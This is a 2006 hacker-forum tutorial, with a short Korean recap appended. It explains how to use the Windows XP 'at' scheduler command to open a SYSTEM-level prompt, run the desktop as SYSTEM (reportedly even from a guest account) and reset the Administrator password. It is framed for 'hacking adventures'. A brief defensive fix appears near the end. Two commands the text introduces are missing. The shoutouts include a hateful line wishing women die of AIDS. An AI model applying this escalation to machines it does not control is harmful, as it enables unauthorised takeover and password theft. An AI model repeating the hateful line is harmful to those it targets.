[0.0] Table of Contents
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[1.0] ...................... Abstract
-
[1.1] ..................... Why hackers should care
[2.0] ...................... Introduction to Local System
-
[2.1] ..................... Getting SYSTEM
-
[2.2] ..................... What to do now
-
[2.3] ..................... Abnormalities & experimentation
-
[2.4] ..................... A quick fix
[3.0] ...................... Ending notes
-
[3.1] ..................... Questions/Comments/Contact
-
[3.2] ..................... Shoutz & Flamez
-
[3.3] ..................... Copyright information
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[1.0] Abstract
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it's kernel. On many machines this can be exploited even with the guest account. At the time I'm publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the
SYSTEM command prompt.
-
[1.1] Why hackers should care
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren't normally possible (like resetting the administrator password).
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[2.0] Introduction to Local System
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The
Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as
SYSTEM in the Task Manager process list, as seen in the following screen shot:
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
Quote: |
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT. |
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
-[2.1] Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
If it responds with an "access denied" error, then we are out of luck, and you'll have to try another method of privilege escalation; if it responds with "There are no entries in the list" (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it's limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code: |
at 15:25 /interactive "cmd.exe" |
Lets break down the preceding code. The "at" told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer's clock says it's 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You'll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
A desktop will come back up, but what this? It isn't your desktop. Go to the start menu and look at the user name, it should say "SYSTEM". Also open up task manager again, and you'll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
-[2.2] What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I'll leave the rest up to your imagination.
Applications running as SYSTEM
Resetting Administrator's password
-[2.3] Abnormalities & experimentation
I've noticed different results depending on the service pack and hot fixes installed; for example, sometimes when I try to open the user control panel applet, I get a error saying user not recognized, and the location where the Local System account profile is stored also varies. I haven't had much time to explore this, so if you find anything else, please use the email address found in the contact section of this article, and send a note my way.
-[2.4] A quick fix
A way to prevent this from happening at all, would be to make the task scheduler service run under a unprivileged account. You can do this by opening the services control panel (Start > Run > services.msc), and right clicking "Task Scheduler" and going to the Log On tab. Change it to "This Account" and enter the account information you want it to use (has to be an existing account) then restart the service. This may break some programs that use the Task Scheduler and depend on it for SYSTEM access; you have been warned. Otherwise, simple disable the Task Scheduler service.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[3.0] Ending notes
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thank you for reading my tutorial, this is now my third article, & I'm very happy with how it turned out. I hope I didn't confuse you too much. I also hope you'll be able to use these techniques in your hacking adventures. Please check out my forums; we are looking for people with content for us to publish, & people interested in discussing computers, networking, & information security. We also provide hosting to qualified hacking/programming projects.
-[3.1] Questions/Comments/Contact
If you have any questions or comments about this tutorial, please feel free to email me at zipk0der@pandora-security.com . You can also reach me by aim, yahoo, or msn; my aim and yahoo screen name is zipk0der, & my msn screen name is the same as my email. I'm always hanging out on my forums, so you can find me there too. You might also find me in #pansec on irc.pandora-security.com
-[3.2] Shoutz & Flamez
Special thanks to Spawn Point ( http://spawnpoint.us ) for "allowing" me to test this on their machines while mine was down.
Shoutz to stderr, Deanalator, sgtfubar, drraid, ny0nx, epic, varu, Dr Locke Z2A, ch4r, Gnome, & xplicit.
Flamez to my ex-girlfriends (may you all catch AIDS & DIE).
Shout @ me in your articles, send flamez to /dev/null.
-
[3.3] Copyright information
Copyright © 2006 Daniel Hückmann & Pandora Security.
All articles published on Pandora Security may be posted to another site for non-commercial purposes without having to request permission, but please view the full copyright policy @
http://www.pandora-security.com/forum/viewtopic.php?t=2026 beforehand.
No copyright or contact information in this tutorial may be edited or removed.
정리해서 말하자면
at 15:25 /interactive "cmd.exe" 또 다른 커맨드 창이 뜨는데
system 권한으로 뜨게 된다.
여기서 explorer.exe 를 실행시키면 로그인 사용자가 system 로 변한다.
이때 administrator 의 패스워드를 변경시키는 것입니다.